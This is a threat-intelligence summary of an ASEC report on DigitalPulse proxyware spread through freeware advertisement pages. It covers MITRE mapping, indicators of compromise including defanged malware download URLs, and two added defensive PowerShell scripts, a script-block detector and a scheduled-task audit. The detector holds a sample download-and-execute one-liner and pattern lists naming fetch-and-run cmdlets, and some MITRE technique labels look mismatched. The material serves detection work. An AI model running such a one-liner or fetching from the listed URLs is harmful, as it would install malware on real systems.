Full Report
AhnLab SEcurity intelligence Center (ASEC) has recently confirmed that proxyware is being installed through advertisement pages of freeware software sites. The proxyware that is ultimately installed is signed with a Netlink Connect certificate, but according to the AhnLab analysis, it is identical to the DigitalPulse proxyware that was abused in past Proxyjacking attack campaigns. While […]
Analysis Summary
# Tool/Technique: DigitalPulse Proxyware (Signed as Netlink Connect)
## Overview
DigitalPulse is a strain of proxyware secretly installed on victim systems via advertisement pages associated with freeware software downloads. Its purpose is to hijack the victim's internet bandwidth for financial gain, similar to other proxyware strains like IPRoyal, Peer2Profit, Traffmonetizer, Proxyrack, and PacketStream. This specific variant is notable for being signed with a "Netlink Connect" certificate, though functionally it is identical to previously observed DigitalPulse instances.
## Technical Details
- Type: Malware family (Proxyware)
- Platform: Windows
- Capabilities: Bandwidth resource hijacking, anti-analysis/anti-VM routines, persistence via Task Scheduler.
- First Seen: The report describes a recent resurgence (2024); the DigitalPulse strain itself was already active in 2023.
## MITRE ATT&CK Mapping
This summary focuses on the observed delivery and execution mechanisms, and the core function of the resulting proxyware.
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (related to past LummaC2 distribution)
    - T1566.004 - Phishing: Malicious File
- **TA0002 - Execution**
  - T1204 - User Execution
    - T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
  - T1497 - Virtualization/Sandbox Evasion
- **TA0003 - Persistence**
  - T1547 - Boot or Logon Autostart Execution
    - T1547.011 - Scheduled Task/Job
## Functionality
### Core Capabilities
- **Resource Hijacking:** Shares the infected system's internet bandwidth with external parties, without the user's consent, for monetary profit (Proxyjacking).
- **Disguise:** The initial loader malware masquerades as a legitimate utility named "AutoClicker.exe" (a GUI auto-click feature program).
- **Persistence:** Installs the final proxyware payload (NTService.exe) in a hidden location (`C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Performance\`) and creates a persistence mechanism via the Windows Task Scheduler named "Network Performance".
### Advanced Features
- **String Encryption:** The "AutoClicker" downloader encrypts its strings and disguises function names to complicate static analysis.
- **Anti-Analysis:** Implements extensive checks to detect analysis environments (VMs and Sandboxes) by checking loaded DLLs (e.g., Sandboxie, Comodo, Cuckoo), firmware details (Hyper-V, VMware), specific kernel files (KVM, VirtualBox), running services, open ports, named pipes, and process names (e.g., Procmon64).
- **Chained Infection:** Utilizes compromised or malvertising-driven websites to redirect users, potentially spreading secondary threats like LummaC2 via clipboard commands.
## Indicators of Compromise
- File Hashes: MD5 `0321c9bc08e5f14cab6dfa53e458247e`, `08a5b638c95b7bf98182e35c9535cbf5`, `2a6aa8a4b14623939861922fb737a0a4`, `2b47d8945d1bf31ce9c9cd3a8ee4f5f2`, `2dda6b6e4d4937570a362c0504f46639`
- File Names: `AutoClicker.exe` (Initial loader/downloader), `NTService.exe` (Final proxyware payload)
- Registry Keys: Not explicitly detailed, but Task Scheduler registration is used.
- Network Indicators:
  - URLs distributing stages: `https[:]//a[.]pairnewtags[.]com/pid/s[.]js`, `https[:]//c[.]pairnewtags[.]com/c[.]txt`, `https[:]//filerit[.]com/k[.]js`, `https[:]//filerit[.]com/pi-240924[.]ps1`, `https[:]//raw[.]githubusercontent[.]com/Evastrea/5Ag3R4ObWH/main/GKPXAP[.]exe`
- Behavioral Indicators:
  - Execution of PowerShell commands delivered through obfuscated JavaScript loaders.
  - Registration of a scheduled task named "Network Performance" for persistence.
  - Repeated checks for virtualization artifacts and analysis tools.
## Associated Threat Actors
- Threat actors involved in past **Proxyjacking** campaigns using **DigitalPulse**.
- General threat groups leveraging malvertising/ad-page redirection schemes to distribute PUPs/malware.
## Detection Methods
- Signature-based detection: AhnLab detection names include `Trojan/Win.Proxyware.R645077`, `Trojan/Win.FSAutcik.R684719`, `Dropper/Win.Proxyware.C5701827`, etc.
- Behavioral detection: Detection of PowerShell execution downloading resources from suspicious URLs, especially when masked or disguised (`Execution/MDP.Powershell.M2514`).
- YARA rules: Not explicitly provided, but signatures targeting known strings or anti-analysis routines of DigitalPulse would be effective.
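The behavioral detection above targets PowerShell that fetches content from the internet and runs it in the same breath. The following is an added example (not code from the ASEC report or from AhnLab) showing how a defender can apply that logic to script block logs: it separates "fetch" patterns from "run" patterns so that a single block doing both stands out from ordinary downloads, and it matches the domains quoted in this summary's network IoCs (refanged for matching). It assumes script block logging (Event ID 4104) is enabled on the host; the sample script blocks at the bottom are constructed for the demonstration.

```powershell
# Added example: flag download-and-execute PowerShell script blocks (not from the ASEC report).
# Assumptions: Event ID 4104 logging is on; $PageDomains come from the summary's IoC list (refanged);
# the $Samples at the bottom are constructed inputs, not captured attacker commands.
$PageDomains = @('pairnewtags.com', 'filerit.com', 'raw.githubusercontent.com/Evastrea')

# "Fetch" and "run" patterns are kept apart so that a benign download alone does not trigger
$FetchPatterns = @('DownloadString', 'DownloadFile', 'Net\.WebClient', 'Invoke-WebRequest', '\biwr\b',
                   'Invoke-RestMethod', '\birm\b', 'Start-BitsTransfer', '\.ps1\b')
$RunPatterns   = @('Invoke-Expression', '\biex\b', 'FromBase64String', '-enc(odedcommand)?\b',
                   'Start-Process', '\.Invoke\(')

function Test-ScriptBlockText {
    param([Parameter(Mandatory)][string]$Text)
    $fetch = @($FetchPatterns | Where-Object { $Text -match $_ })
    $run   = @($RunPatterns   | Where-Object { $Text -match $_ })
    $iocs  = @($PageDomains   | Where-Object { $Text -like "*$_*" })
    # Any reference to a report domain is a hit; otherwise require fetch AND run in one block
    $verdict = if ($iocs.Count -gt 0) { 'IoC match' }
               elseif ($fetch.Count -gt 0 -and $run.Count -gt 0) { 'download-and-execute' }
               else { $null }
    if ($verdict) {
        $flat = $Text -replace '\s+', ' '
        [pscustomobject]@{
            Verdict = $verdict
            Matches = (($fetch + $run + $iocs) -join ', ')
            Snippet = $flat.Substring(0, [Math]::Min(160, $flat.Length))
        }
    }
}

function Get-SuspiciousScriptBlocks {
    param([int]$LookbackHours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                 StartTime = (Get-Date).AddHours(-$LookbackHours) }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $text = $e.Properties[2].Value          # ScriptBlockText field of a 4104 event
        if (-not $text) { continue }
        $hit = Test-ScriptBlockText -Text $text
        if ($hit) { $hit | Add-Member -NotePropertyName Time -NotePropertyValue $e.TimeCreated -PassThru }
    }
}

# Constructed samples: a benign download, a fetch-and-run one-liner, and a reference to a report domain
$Samples = @(
    'Invoke-WebRequest https://example.invalid/readme.txt -OutFile readme.txt',
    'iex ((New-Object Net.WebClient).DownloadString("https://example.invalid/x.ps1"))',
    'Invoke-WebRequest https://filerit.com/example.ps1 -OutFile $env:TEMP\p.ps1'
)
$Samples | ForEach-Object { Test-ScriptBlockText -Text $_ } | Format-Table -AutoSize
# Only the second and third samples are reported; then sweep the live log:
Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

The first sample is deliberately not flagged: it fetches but never executes, which is what keeps this rule from firing on routine package downloads. Tune `$FetchPatterns` and `$RunPatterns` to the environment rather than adding every cmdlet alias at once.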
## Mitigation Strategies
- **User Awareness:** Exercise caution when downloading freeware from unofficial sites or responding to unexpected advertisements or pop-ups. Do not run downloaded executables until the source has been verified.
- **Execution Control:** Implement controls (like AppLocker or constrained language modes) to restrict suspicious PowerShell execution, especially that which involves downloading and executing files from the internet.
- **System Hardening:** Regularly audit the Task Scheduler for newly created or unusual tasks, particularly those running under system context or related to "Network Performance."
- **Security Software:** Utilize endpoint detection and response tools capable of identifying the multi-stage infection process and the known characteristics of proxyware families.
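To turn the persistence description under Core Capabilities and the Task Scheduler audit recommended above into a repeatable check, here is an added example (not code from the ASEC report or from AhnLab). It enumerates scheduled tasks and flags any whose name, action path, payload file name or MD5 matches what this summary reports, lists whatever sits in the hidden drop directory, and reports whether the execution controls recommended under Mitigation Strategies are in place. It assumes an elevated PowerShell session on a Windows endpoint; the task name, directory, file name and hashes are the ones quoted in this summary.

```powershell
# Added example: audit an endpoint for the reported persistence and for execution controls
# (not from the ASEC report). Assumptions: run elevated; task name, drop directory, payload
# name and MD5 values are those quoted in the summary above.
$SuspectTaskName = 'Network Performance'
$SuspectDir = Join-Path $env:SystemRoot 'System32\config\systemprofile\AppData\Local\Microsoft\Performance'
$KnownMd5 = @('0321c9bc08e5f14cab6dfa53e458247e', '08a5b638c95b7bf98182e35c9535cbf5',
              '2a6aa8a4b14623939861922fb737a0a4', '2b47d8945d1bf31ce9c9cd3a8ee4f5f2',
              '2dda6b6e4d4937570a362c0504f46639')

function Find-SuspiciousTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }          # COM-handler actions carry no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            if (-not $exe) { continue }
            $reasons = @()
            if ($task.TaskName -eq $SuspectTaskName) { $reasons += 'task name matches report' }
            if ($exe -like "$SuspectDir\*")          { $reasons += 'runs from hidden systemprofile directory' }
            if ($exe -like '*\NTService.exe')        { $reasons += 'payload file name matches report' }
            if (Test-Path -LiteralPath $exe -PathType Leaf) {
                $md5 = (Get-FileHash -LiteralPath $exe -Algorithm MD5).Hash.ToLower()
                if ($KnownMd5 -contains $md5) { $reasons += "MD5 $md5 listed as IoC" }
            }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    TaskName = $task.TaskName; TaskPath = $task.TaskPath
                    RunAs = $task.Principal.UserId; Execute = $exe
                    Arguments = $action.Arguments; Reasons = ($reasons -join '; ')
                }
            }
        }
    }
}

function Get-DropDirContents {
    # Anything here is suspect even if no task references it yet
    if (Test-Path -LiteralPath $SuspectDir) {
        Get-ChildItem -LiteralPath $SuspectDir -File -Force | ForEach-Object {
            $md5 = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5).Hash.ToLower()
            [pscustomobject]@{ FullName = $_.FullName; Length = $_.Length
                               LastWriteTime = $_.LastWriteTime; MD5 = $md5
                               KnownIoC = ($KnownMd5 -contains $md5) }
        }
    }
}

function Test-ExecutionControls {
    $sbl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' `
                            -ErrorAction SilentlyContinue
    $policy = try { Get-AppLockerPolicy -Effective -ErrorAction Stop } catch { $null }
    [pscustomobject]@{
        ScriptBlockLogging   = ($sbl.EnableScriptBlockLogging -eq 1)
        LanguageMode         = $ExecutionContext.SessionState.LanguageMode   # 'ConstrainedLanguage' is the hardened value
        AppLockerScriptRules = [bool]($policy.RuleCollections | Where-Object { $_.RuleCollectionType -eq 'Script' })
    }
}

Find-SuspiciousTasks | Format-List
Get-DropDirContents  | Format-Table -AutoSize
Test-ExecutionControls
```

The task check deliberately matches on more than the name: a renamed task that still launches from the `systemprofile` directory, or a file that still carries one of the reported hashes, is caught by the path and hash tests. `Test-ExecutionControls` reports the language mode of the current session, so run it in the same context users get, not only from an exempted administrator shell.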
## Related Tools/Techniques
- **Proxyware Strains:** IPRoyal, Peer2Profit, Traffmonetizer, Proxyrack, PacketStream.
- **Previously Linked Malware:** DigitalPulse (core proxyware strain), LummaC2 (distributed via clipboard command technique).
- **Technique Relation:** Related to cryptojacking in its use of unauthorized system resources for profit.